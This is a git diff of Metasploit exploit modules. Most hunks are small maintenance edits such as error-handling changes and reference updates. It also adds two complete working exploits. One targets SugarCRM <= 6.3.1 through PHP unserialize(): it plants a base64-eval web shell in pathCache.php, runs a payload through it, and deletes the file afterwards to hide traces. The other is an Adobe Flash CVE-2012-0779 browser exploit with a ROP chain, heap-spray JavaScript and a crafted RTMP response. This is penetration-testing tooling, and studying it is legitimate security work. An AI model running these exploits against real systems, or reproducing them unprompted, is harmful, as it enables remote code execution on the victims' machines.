diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb
index d8834be8e1..bbf6c12be1 100644
--- a/modules/exploits/unix/webapp/redmine_scm_exec.rb
+++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ ['CVE', '2011-4929'],
['OSVDB', '70090'],
['URL', 'http://www.redmine.org/news/49' ]
],
diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
index a8849aa592..9aa86df648 100644
--- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb
+++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Successfully retrieved hash: #{res.body}")
return res.body
else
- raise RuntimeError.new("Failed to retrieve hash, server may not be vulnerable.")
+ fail_with(Exploit::Failure::NotVulnerable, "Failed to retrieve hash, server may not be vulnerable.")
return false
end
end
diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
new file mode 100644
index 0000000000..c2b8fd32bb
--- /dev/null
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -0,0 +1,156 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'SugarCRM <= 6.3.1 unserialize() PHP Code Execution',
+ 'Description' => %q{
+ This module exploits a php unserialize() vulnerability in SugarCRM <= 6.3.1
+ which could be abused to allow authenticated SugarCRM users to execute arbitrary
+ code with the permissions of the webserver.
+
+ The dangerous unserialize() exists in the 'include/MVC/View/views/view.list.php'
+ script, which is called with user controlled data from the 'current_query_by_page'
+ parameter. The exploit abuses the __destruct() method from the SugarTheme class
+ to write arbitrary PHP code to a 'pathCache.php' on the web root.
+ },
+ 'Author' =>
+ [
+ 'EgiX', # Vulnerability discovery and PoC
+ 'juan vazquez', # Metasploit module
+ 'sinn3r' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2012-0694' ],
+ [ 'EDB', '19381' ],
+ [ 'URL', 'http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/' ]
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ },
+ 'Targets' => [ ['Automatic', { }], ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jun 23 2012'
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"]),
+ OptString.new('USERNAME', [true, "The username to authenticate with" ]),
+ OptString.new('PASSWORD', [true, "The password to authenticate with" ])
+ ], self.class)
+ end
+
+
+ def on_new_session(client)
+ if client.type == "meterpreter"
+ f = "pathCache.php"
+ client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+ begin
+ client.fs.file.rm(f)
+ print_good("#{@peer} - #{f} removed to stay ninja")
+ rescue
+ print_error("#{@peer} - Unable to remove #{f}")
+ end
+ end
+ end
+
+ def exploit
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+
+ @peer = "#{rhost}:#{rport}"
+ username = datastore['USERNAME']
+ password = datastore['PASSWORD']
+
+ # Can't use vars_post because it'll escape "_"
+ data = "module=Users&"
+ data << "action=Authenticate&"
+ data << "user_name=#{username}&"
+ data << "user_password=#{password}"
+
+ res = send_request_cgi(
+ {
+ 'uri' => "#{base}index.php" ,
+ 'method' => "POST",
+ 'headers' =>
+ {
+ 'Cookie' => "PHPSESSID=1",
+ },
+ 'data' => data
+ })
+
+ if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
+ print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
+ return
+ end
+
+ if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
+ session_id = $1
+ else
+ print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
+ return
+ end
+
+ print_status("#{@peer} - Login successful with #{username}:#{password}")
+
+ data = "module=Contacts&"
+ data << "Contacts2_CONTACT_offset=1&"
+ data << "current_query_by_page="
+ #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"";}
+ data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
+
+ print_status("#{@peer} - Exploiting the unserialize()")
+
+ res = send_request_cgi(
+ {
+ 'uri' => "#{base}index.php",
+ 'method' => 'POST',
+ 'headers' =>
+ {
+ 'Cookie' => "PHPSESSID=#{session_id};",
+ },
+ 'data' => data
+ })
+
+ if not res or res.code != 200
+ print_error("#{@peer} - Exploit failed: #{res.code}")
+ return
+ end
+
+ print_status("#{@peer} - Executing the payload")
+
+ res = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => "#{base}pathCache.php",
+ 'headers' => {
+ 'Cmd' => Rex::Text.encode_base64(payload.encoded)
+ }
+ })
+
+ if res
+ print_error("#{@peer} - Payload execution failed: #{res.code}")
+ return
+ end
+
+ end
+end
diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
index 755ddb5430..05d9b5c4ba 100644
--- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
@@ -192,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
# 3. cannot use `, ', ", or space
if (f_val.index('\'') or f_val.index('"') or f_val.index('`') or f_val.index(' '))
- raise RuntimeError, "The value for the 'f' variable contains an invalid character!"
+ fail_with(Exploit::Failure::Unknown, "The value for the 'f' variable contains an invalid character!")
end
# 4. the function must be one of:
diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb
index fd230a6473..23ea4e04d5 100644
--- a/modules/exploits/unix/webapp/trixbox_langchoice.rb
+++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb
@@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
# The call should return status code 200
if delivery_response.code != 200
- raise RuntimeError, "Server returned unexpected HTTP code #{delivery_response.code}"
+ fail_with(Exploit::Failure::NotFound, "Server returned unexpected HTTP code #{delivery_response.code}")
end
print_status "The server responded to POST with HTTP code #{delivery_response.code}"
@@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Make sure cookies were set
if cookies.nil?
- raise RuntimeError, 'The server did not set any cookies'
+ fail_with(Exploit::Failure::NotFound, 'The server did not set any cookies')
end
# Contents of PHPSESSID. About to be set.
@@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote
if cookies =~ PHPSESSID_REGEX
session_id = $1
else
- raise RuntimeError, 'The cookie PHPSESSID was not set.'
+ fail_with(Exploit::Failure::NotFound, 'The cookie PHPSESSID was not set.')
end
print_status "We were assigned a session id (cookie PHPSESSID) of '#{session_id}'"
diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb
index cd75932e27..60992ffeb8 100644
--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (res and res.code == 200)
print_status("Successfully sent exploit request")
else
- raise RuntimeError, "Error sending exploit request"
+ fail_with(Exploit::Failure::Unknown, "Error sending exploit request")
end
handler
diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb
index 07ab33b384..8d53310d6c 100644
--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (res and res.code == 200)
print_status("Successfully sent exploit request")
else
- raise RuntimeError, "Error sending exploit request"
+ fail_with(Exploit::Failure::Unknown, "Error sending exploit request")
end
handler
diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
index 96282f0953..2e0bd31649 100644
--- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
+++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
connect
if ( cmd.length > 128 )
- raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
+ fail_with(Exploit::Failure::Unknown, "Command strings greater then 128 characters will not be processed!")
end
string_uno = Rex::Text.rand_text_alpha_upper(11)
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Target not supported.'
+ fail_with(Exploit::Failure::Unknown, 'Target not supported.')
end
handler
diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb
index 7ae811ee0b..be629648df 100644
--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Target not supported.'
+ fail_with(Exploit::Failure::Unknown, 'Target not supported.')
end
handler
diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb
index a38e557d8c..a495f6f556 100644
--- a/modules/exploits/windows/brightstor/discovery_tcp.rb
+++ b/modules/exploits/windows/brightstor/discovery_tcp.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '13814'],
[ 'BID', '12536'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
- [ 'URL', 'http://milw0rm.com/exploits/1131'],
+ [ 'EDB', '1131']
],
'Privileged' => true,
'Payload' =>
diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb
index eec3319e61..e60158de8c 100644
--- a/modules/exploits/windows/brightstor/tape_engine.rb
+++ b/modules/exploits/windows/brightstor/tape_engine.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2006-6076' ],
[ 'OSVDB', '30637' ],
[ 'BID', '21221' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/3086' ],
+ [ 'EDB', '3086' ],
[ 'URL', 'http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317' ],
],
'Privileged' => true,
diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
new file mode 100644
index 0000000000..09f9b4a4fa
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -0,0 +1,490 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::Remote::BrowserAutopwn
+
+ autopwn_info({
+ :os_name => OperatingSystems::WINDOWS,
+ :ua_name => HttpClients::IE,
+ :ua_minver => "6.0",
+ :ua_maxver => "8.0",
+ :method => "GetVariable",
+ :classid => "ShockwaveFlash.ShockwaveFlash",
+ :rank => NormalRanking, # reliable memory corruption
+ :javascript => true
+ })
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Adobe Flash Player Object Type Confusion",
+ 'Description' => %q{
+ This module exploits a vulnerability found in Adobe Flash
+ Player. By supplying a corrupt AMF0 "_error" response, it
+ is possible to gain arbitrary remote code execution under
+ the context of the user.
+
+ This vulnerability has been exploited in the wild as part of
+ the "World Uyghur Congress Invitation.doc" e-mail attack.
+ According to the advisory, 10.3.183.19 and 11.x before
+ 11.2.202.235 are affected.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'sinn3r', # Metasploit module
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-0779' ],
+ [ 'OSVDB', '81656'],
+ [ 'BID', '53395' ],
+ [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-09.html'], # Patch info
+ [ 'URL', 'http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html' ]
+ ],
+ 'Payload' =>
+ {
+ #'Space' => 1024,
+ 'BadChars' => "\x00"
+ },
+ 'DefaultOptions' =>
+ {
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ # Flash Player 11.2.202.228
+ [ 'Automatic', {} ],
+ [
+ 'IE 6 on Windows XP SP3',
+ {
+ 'Rop' => nil,
+ 'RandomHeap' => false,
+ 'Offset' => '0x0'
+ }
+ ],
+ [
+ 'IE 7 on Windows XP SP3',
+ {
+ 'Rop' => nil,
+ 'RandomHeap' => false,
+ 'Offset' => '0x0'
+ }
+ ],
+ [
+ 'IE 8 on Windows XP SP3 with msvcrt ROP',
+ {
+ 'Rop' => :msvcrt,
+ 'RandomHeap' => false,
+ 'Offset' => '238',
+ 'StackPivot' => 0x77c12100, # add esp, edx # retn 77 # from msvcrt.dll
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "May 04 2012",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]),
+ OptAddress.new('RTMPHOST', [ true, "The local host to RTMP service listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
+ OptPort.new('RTMPPORT', [ true, "The local port to RTMP service listen on.", 1935 ]),
+ ], self.class
+ )
+
+ end
+
+ def get_target(agent)
+ #If the user is already specified by the user, we'll just use that
+ return target if target.name != 'Automatic'
+
+ if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
+ return targets[1] #IE 6 on Windows XP SP3
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
+ return targets[2] #IE 7 on Windows XP SP3
+ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
+ return targets[3] #IE 8 on Windows XP SP3
+ else
+ return nil
+ end
+ end
+
+ def junk(n=4)
+ return rand_text_alpha(n).unpack("V").first
+ end
+
+ def nop
+ return make_nops(4).unpack("V").first
+ end
+
+ def ret(t)
+ return [ 0x77c4ec01 ].pack("V") # RETN (ROP NOP) # msvcrt.dll
+ end
+
+ def popret(t)
+ return [ 0x77c4ec00 ].pack("V") # POP EBP # RETN (ROP NOP) # msvcrt.dll
+ end
+
+ def get_rop_chain(t)
+
+ # ROP chains generated by mona.py - See corelan.be
+ print_status("Using msvcrt ROP")
+ rop =
+ [
+ 0x77c4e392, # POP EAX # RETN
+ 0x77c11120, # <- *&VirtualProtect()
+ 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
+ junk,
+ 0x77c2dd6c,
+ 0x77c4ec00, # POP EBP # RETN
+ 0x77c35459, # ptr to 'push esp # ret'
+ 0x77c47705, # POP EBX # RETN
+ 0x00001000, # EBX
+ 0x77c3ea01, # POP ECX # RETN
+ 0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
+ 0x77c46100, # POP EDI # RETN
+ 0x77c46101, # ROP NOP (-> edi)
+ 0x77c4d680, # POP EDX # RETN
+ 0x00000040, # newProtect (0x40) (-> edx)
+ 0x77c4e392, # POP EAX # RETN
+ nop, # NOPS (-> eax)
+ 0x77c12df9, # PUSHAD # RETN
+ ].pack("V*")
+
+ code = ret(t)
+ code << rand_text(119)
+ code << rop
+ code << "\xbc\x0c\x0c\x0c\x0c" #mov esp,0c0c0c0c ; my way of saying 'f you' to the problem
+ code << payload.encoded
+ offset = 2616 - code.length
+ code << rand_text(offset)
+ code << [ t['StackPivot'] ].pack("V")
+ return code
+ end
+
+ def get_easy_spray(t, js_code, js_nops)
+
+ spray = <<-JS
+ var heap_obj = new heapLib.ie(0x20000);
+ var code = unescape("#{js_code}");
+ var nops = unescape("#{js_nops}");
+
+ while (nops.length < 0x80000) nops += nops;
+
+ var offset = nops.substring(0, #{t['Offset']});
+ var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
+
+ while (shellcode.length < 0x40000) shellcode += shellcode;
+ var block = shellcode.substring(0, (0x80000-6)/2);
+
+
+ heap_obj.gc();
+ for (var z=1; z < 0x185; z++) {
+ heap_obj.alloc(block);
+ }
+
+ JS
+
+ return spray
+
+ end
+
+
+ def get_aligned_spray(t, js_rop, js_nops)
+
+ spray = <<-JS
+
+ var heap_obj = new heapLib.ie(0x20000);
+ var nops = unescape("#{js_nops}");
+ var rop_chain = unescape("#{js_rop}");
+
+ while (nops.length < 0x80000) nops += nops;
+
+ var offset = nops.substring(0, #{t['Offset']});
+ var shellcode = offset + rop_chain + nops.substring(0, 0x800-offset.length-rop_chain.length);
+
+
+ while (shellcode.length < 0x40000) shellcode += shellcode;
+ var block = shellcode.substring(0, (0x80000-6)/2);
+
+
+ heap_obj.gc();
+ for (var z=1; z < 0x1c5; z++) {
+ heap_obj.alloc(block);
+ }
+
+ JS
+
+ return spray
+
+ end
+
+ def exploit
+ @swf = create_swf
+
+ # Boilerplate required to handled pivoted listeners
+ comm = datastore['ListenerComm']
+ if comm == "local"
+ comm = ::Rex::Socket::Comm::Local
+ else
+ comm = nil
+ end
+
+ @rtmp_listener = Rex::Socket::TcpServer.create(
+ 'LocalHost' => datastore['RTMPHOST'],
+ 'LocalPort' => datastore['RTMPPORT'],
+ 'Comm' => comm,
+ 'Context' => {
+ 'Msf' => framework,
+ 'MsfExploit' => self,
+ }
+ )
+
+ # Register callbacks
+ @rtmp_listener.on_client_connect_proc = Proc.new { |cli|
+ add_socket(cli)
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to RTMP")
+ on_rtmp_connect(cli)
+ }
+
+ @rtmp_listener.start
+
+ super
+ end
+
+ def my_read(cli,size,timeout=nil)
+ if timeout.nil?
+ timeout = cli.def_read_timeout
+ end
+
+ buf = ""
+ ::Timeout::timeout(timeout) {
+ while buf.length < size
+ buf << cli.get_once(size - buf.length)
+ end
+ }
+ buf
+ end
+
+ def do_handshake(cli)
+ c0 = my_read(cli, 1)
+ c1 = my_read(cli, 1536) # HandshakeSize => 1536
+ s0 = "\3" # s0
+ s1 = Rex::Text.rand_text(4) # s1.time
+ s1 << "\x00\x00\x00\x00" # s1.zero
+ s1 << Rex::Text.rand_text(1528) # s1.random_data
+ s2 = c1 # s2
+ cli.put(s0)
+ cli.put(s1)
+ cli.put(s2)
+ c2 = my_read(cli, 1536) # C2 (HandshakeSize => 1536)
+ end
+
+ def on_rtmp_connect(cli)
+
+ begin
+ do_handshake(cli)
+ request = my_read(cli, 341) # connect request length
+
+ case request
+ when /connect/
+ rtmp_header = "\x03" # Chunk Stream ID
+ rtmp_header << "\x00\x00\x00" # Timestamp
+ rtmp_header << "\x00\x00\x71" # Body Size
+ rtmp_header << "\x14" # AMF0 Command
+ rtmp_header << "\x00\x00\x00\x00" # Stream ID
+
+ # String
+ rtmp_body = "\x02" # String
+ rtmp_body << "\x00\x06" # String length
+ rtmp_body << "\x5f\x65\x72\x72\x6f\x72" # String: _error
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << "\x40\x00\x00\x00\x00\x00\x00\x00" # Number
+ # Array
+ rtmp_body << "\x0a" # AMF Type: Array
+ rtmp_body << "\x00\x00\x00\x05" # Array length: 5
+ # Array elements
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ # Crafter Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x0c\x0c\x0c\x0c" # Modify the "\x0c\x0c\x0c\x0c" to do an arbitrary call
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+ # Number
+ rtmp_body << "\x00" # AMF Type: Number
+ rtmp_body << [rand(0x40000000)].pack("V") + "\x00\x00\x00\x00" # Number
+
+ trigger = rtmp_header
+ trigger << rtmp_body
+
+ cli.put(trigger)
+ @rtmp_listener.close_client(cli)
+ end
+ rescue
+ ensure
+ @rtmp_listener.close_client(cli)
+ remove_socket(cli)
+ end
+
+ end
+
+ def cleanup
+ super
+ return if not @rtmp_listener
+
+ begin
+ @rtmp_listener.deref if @rtmp_listener.kind_of?(Rex::Service)
+ if @rtmp_listener.kind_of?(Rex::Socket)
+ @rtmp_listener.close
+ @rtmp_listener.stop
+ end
+ @rtmp_listener = nil
+ rescue ::Exception
+ end
+ end
+
+ def on_request_uri(cli, request)
+
+ agent = request.headers['User-Agent']
+ my_target = get_target(agent)
+
+ # Avoid the attack if the victim doesn't have the same setup we're targeting
+ if my_target.nil?
+ print_error("Browser not supported: #{agent}")
+ send_not_found(cli)
+ return
+ end
+
+ print_status("Client requesting: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status("Sending Exploit SWF")
+ send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
+ return
+ end
+
+ p = payload.encoded
+ js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
+ js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+
+ if not my_target['Rop'].nil?
+ js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))
+ js = get_aligned_spray(my_target, js_rop, js_nops)
+ else
+ js = get_easy_spray(my_target, js_code, js_nops)
+ end
+
+ js = heaplib(js, {:noobfu => true})
+
+ if datastore['OBFUSCATE']
+ js = ::Rex::Exploitation::JSObfu.new(js)
+ js.obfuscate
+ end
+
+ swf_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
+ swf_uri << "/#{rand_text_alpha(rand(6)+3)}.swf"
+
+ if datastore['RTMPHOST'] == '0.0.0.0'
+ rtmp_host = Rex::Socket.source_address('1.2.3.4')
+ else
+ rtmp_host = datastore['RTMPHOST']
+ end
+
+ rtmp_port = datastore['RTMPPORT']
+
+ html = %Q|
+
+
+
+
+
+
+
+
+
+
+
+ |
+
+ html = html.gsub(/^\t\t/, '')
+
+ print_status("Sending html")
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+ end
+
+ def create_swf
+ path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-0779.swf" )
+ fd = ::File.open( path, "rb" )
+ swf = fd.read(fd.stat.size)
+ fd.close
+
+ return swf
+ end
+
+end
+
+=begin
+
+* Flash Player 11.2.202.228
+
+(348.540): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=02dbac01 ebx=0013e2e4 ecx=02dbac10 edx=44444444 esi=02dbac11 edi=00000000
+eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
+Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
+104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]
+ds:0023:44444470=????????
+
+0:000> u eip
+Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
+104b1b2d 8b422c mov eax,dword ptr [edx+2Ch]
+104b1b30 53 push ebx
+104b1b31 ffd0 call eax
+
+=end
diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
index 1808a52c1e..21daa6416d 100644
--- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb
+++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'OSVDB', '54706' ],
[ 'BID', '35028' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/8733' ],
+ [ 'EDB', '8733' ],
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
index 53dcb0ae55..bf5a841ca2 100644
--- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb
+++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
- payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/PAYLOAD"
+ payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
if (request.uri.match(/PAYLOAD/))
return if ((p = regenerate_payload(cli)) == nil)
diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
index 1280e2d1f8..5f1e6bb39e 100644
--- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
shellcode = Rex::Text.to_unescape(p.encoded)
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
- url << ":" + datastore['SRVPORT']
+ url << ":" + datastore['SRVPORT'].to_s
url << get_resource
js = <<-ENDJS
#{js_heap_spray}
diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
index ab954f39a4..ffcb83b511 100644
--- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
shellcode = Rex::Text.to_unescape(p.encoded)
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
- url << ":" + datastore['SRVPORT']
+ url << ":" + datastore['SRVPORT'].to_s
url << get_resource
fname = rand_text_alphanumeric(4)
diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb
index cd571929d4..2f7fe92ccd 100644
--- a/modules/exploits/windows/browser/autodesk_idrop.rb
+++ b/modules/exploits/windows/browser/autodesk_idrop.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'OSVDB', '53265' ],
[ 'BID', '34352' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/8560' ],
+ [ 'EDB', '8560' ],
[ 'URL', 'http://marc.info/?l=full-disclosure&m=123870112214736' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
index 25be8d4b1a..1c710c2cd0 100644
--- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
+++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2009-4588' ],
[ 'OSVDB', '60017' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9116' ],
+ [ 'EDB', '9116' ],
[ 'URL', 'http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt' ],
[ 'URL', 'http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/' ]
],
diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
